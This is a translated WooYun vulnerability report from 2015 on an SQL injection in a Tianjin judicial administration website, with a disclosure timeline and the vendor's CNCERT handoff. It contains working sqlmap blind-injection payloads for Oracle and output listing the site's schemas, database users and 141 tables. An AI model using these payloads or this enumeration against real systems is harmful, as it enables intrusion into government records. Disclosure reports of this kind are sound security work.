Vulnerability summary

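Bug ID: wooyun-2015-0137623

Title: SQL injection in the Tianjin Judicial Administration Information Network (天津司法行政信息网), exposing a large amount of important site information

Affected vendor: Tianjin Judicial Administration Information Network

Reported by: 泪雨无魂

Submitted: 2015-08-30 17:45

Fixed: 2015-10-17 10:46

Disclosed: 2015-10-17 10:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 14

Vulnerability status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]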


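Vulnerability details

Disclosure status:

2015-08-30: Details reported to the vendor; awaiting vendor response
2015-09-02: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible organization; details disclosed only to the notified agency
2015-09-12: Details disclosed to core white hats and experts in related fields
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public

Brief description:

SQL injection vulnerability in the Tianjin Judicial Administration Information Network. The site has 20 databases, and a large amount of important information is exposed...

Detailed description:

Injection point: http://**.**.**.**/tianjinlawyermanager/justice/guide/show.jsp?infoID=IC02000007421
20 databases in total, and as many as 33 users...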

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: infoID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: infoID=IC02000007421' AND 7744=7744 AND 'gyBY'='gyBY
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: infoID=IC02000007421' AND 8499=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(122)||CHR(65)||CHR(118),5) AND 'QcRf'='QcRf
---
[09:21:34] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DEVADMIN
[*] DEVPRO
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
database management system users [33]:
[*] ANONYMOUS
[*] APEX_PUBLIC_USER
[*] CTXSYS
[*] DBSNMP
[*] DEVADMIN
[*] DEVPRO
[*] DIP
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XS$NULL
current schema (equivalent to database on Oracle): 'DEVPRO'
current user: 'DEVPRO'
database management system users password hashes:
Database: DEVPRO
[141 tables]
+--------------------------------+
| BAK_TLA_PERSON45 |
| BAK_TLA_STAT1_OPERATION |
| BAK_TLA_STAT2_OPERATION |
| BROAD_DATUM |
| BROAD_PAWN |
| DOSS_CASE_GG |
| DOSS_CASE_YZSB |
| FARE_DERATE_D |
| FARE_DERATE_L |
| FARE_DETAIL_GG |
| LM_COMPLAIN |
| LODGE_RESULT |
| PAPER |
| PAWNER |
| PAWN_LOG |
| REPORT_LOG |
| TEST |
| TLA_ANSWER |
| TLA_APPLICATION |
| TLA_APPREMARK |
| TLA_BBS |
| TLA_CASEREASON |
| TLA_CERTIFICATE |
| TLA_CHANGEADDRAPP |
| TLA_CHANGEDIRAPP |
| TLA_CHANGEFORMAPP |
| TLA_CHANGENAMEAPP |
| TLA_CITY |
| TLA_COMPLAIN |
| TLA_FORUM |
| TLA_FORUM_CATEGORY |
| TLA_FORUM_CATEGORY_LEVEL |
| TLA_GOODFRIEND |
| TLA_HONOR |
| TLA_INFO |
| TLA_INFOANNEX |
| TLA_INFOCATEGORY |
| TLA_INFOIMAGES |
| TLA_INFOSEND |
| TLA_INFOWEB |
| TLA_INVITEPERSON |
| TLA_LAWOFFICE |
| TLA_LAWOFFICEBRANCH |
| TLA_LAWOFFICEBRANCHAPP |
| TLA_LAWPARTNER |
| TLA_LICENCEEXP |
| TLA_MANAGER_MODULE_2 |
| TLA_MANAGER_MODULE_CATEGORY_2 |
| TLA_MANAGER_MODULE_CHARACTER_2 |
| TLA_MANAGER_ROLE_2 |
| TLA_MANAGER_R_M_2 |
| TLA_MANAGER_USER_2 |
| TLA_MANAGER_U_M_2 |
| TLA_MANAGER_U_R_2 |
| TLA_MYMODULE |
| TLA_NAME_APPLY |
| TLA_NAME_APPLY_CHILD |
| TLA_NEWLAWOFFICEAPP |
| TLA_OFFICEINITIATOR |
| TLA_PARTNERAPP |
| TLA_PERSON |
| TLA_PERSONAPP |
| TLA_PUNISH |
| TLA_REASONRECORD |
| TLA_REASONRECORD_COMPLAIN |
| TLA_REWARDS_PUNISH |
| TLA_SMS |
| TLA_STAT1_OPERATION |
| TLA_STAT2_OPERATION |
| TLA_STAT3_ORGAN |
| TLA_STAT4_LAWYER |
| TLA_STAT5_ASSISTANT |
| TLA_STAT6_OPERATION |
| TLA_STUDYEXP |
| TLA_WORKEXP |
| TLA_YEARCHECK |
| TMP_BROAD_DATUM |
| TMP_BROAD_PAWN |
| TMP_DOSS_CASE_YZSB |
| TMP_TYPESLIST |
| TMP_TYPESLISTCENBOW |
| TMP_ZY |
| TNA_ANSWER |
| TNA_ASSESSMENT |
| TNA_BENEFIT |
| TNA_BROAD_DATUM |
| TNA_BROAD_PAWN |
| TNA_CASE |
| TNA_CASEBACKUP |
| TNA_CASECOUNTERPART |
| TNA_COMPENSATION |
| TNA_COMPLAIN |
| TNA_CONTRIBUTIONS |
| TNA_DIRECTORTEL |
| TNA_DOSS_CASE_YZSB |
| TNA_EXECUTIVES |
| TNA_FALSEPAPERS |
| TNA_FREMDNESSNOTARIZATION |
| TNA_GOODFRIEND |
| TNA_GREFFIERSTATISTICS |
| TNA_HONORPUNISH |
| TNA_INFO |
| TNA_INFOANNEX |
| TNA_INFOCATEGORY |
| TNA_INFOIMAGES |
| TNA_INFOWEB |
| TNA_INNERNOTARIZATION |
| TNA_MANAGER_MODULE_2 |
| TNA_MANAGER_MODULE_CATEGORY_2 |
| TNA_MANAGER_MODULE_CHARACTER_2 |
| TNA_MANAGER_ROLE_2 |
| TNA_MANAGER_R_M_2 |
| TNA_MANAGER_USER_2 |
| TNA_MANAGER_U_M_2 |
| TNA_MANAGER_U_R_2 |
| TNA_MATTERS_GATMD |
| TNA_MATTERS_GZC |
| TNA_MATTERS_SFJ |
| TNA_MATTERS_SWGJ |
| TNA_MATTERS_SWMD |
| TNA_MORTAGAGE |
| TNA_NOTARIES |
| TNA_NOTARIZATIONCHARGE |
| TNA_ORGAN |
| TNA_ORGANSTATISTICS |
| TNA_PERSONEDIT |
| TNA_REMOVENOTAR |
| TNA_REPORT_BZJG |
| TNA_SEFCOUNTERPART |
| TNA_SENDRECEIPT |
| TNA_SMS |
| TNA_SORTTINGGGC |
| TNA_SORTTINGGZC |
| TNA_SORTTINGSFB |
| TNA_SPECIALPAPERMANAGER |
| TNA_TAIWANCOUNTERPART |
| TNA_TAIWANHONGKONG |
| TNA_TESTAMENT |
| TNA_TWCHECKCOUNTERPART |
| TNA_UPLOADRECORD |
| YZCX_LOG |
+--------------------------------+



Proof of vulnerability:


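Fix:

You know what to do...

Copyright notice: when reposting, please credit the source: 泪雨无魂@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-09-02 10:45

Vendor reply:

CNVD confirmed and reproduced the situation described, and it has been passed to CNCERT for dispatch to the Tianjin sub-center, which will follow up and coordinate with the site's managing organization to handle it.

Latest status:

None yet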